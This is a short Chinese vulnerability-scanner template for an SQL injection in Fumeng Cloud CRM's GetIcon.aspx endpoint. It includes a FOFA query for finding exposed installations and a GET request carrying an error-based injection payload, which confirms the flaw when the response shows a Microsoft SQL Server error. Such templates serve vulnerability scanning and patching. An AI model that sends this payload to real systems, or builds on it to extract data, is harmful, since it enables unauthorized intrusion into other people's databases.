漏洞描述
孚盟云CRM GetIcon.aspx接口存在SQL注入漏洞
FOFA: app="孚盟软件-孚盟云"
id: fumengyun-crm-geticon-sqli
info:
name: 孚盟云CRM GetIcon.aspx接口存在SQL注入漏洞
author: AVIC123
severity: high
verified: true
description: |-
孚盟云CRM GetIcon.aspx接口存在SQL注入漏洞
FOFA: app="孚盟软件-孚盟云"
reference:
- https://mp.weixin.qq.com/s/k4W5zrBJY3rMjgBWKhNoBw
tags: fumengyun,crm,sqli
created: 2025/08/21
rules:
r0:
request:
method: GET
path: /Common/GetIcon.aspx?FUID=-1'and+1=@@VERSION--
expression: response.status == 500 && response.body.bcontains(b'Microsoft SQL Server')
expression: r0()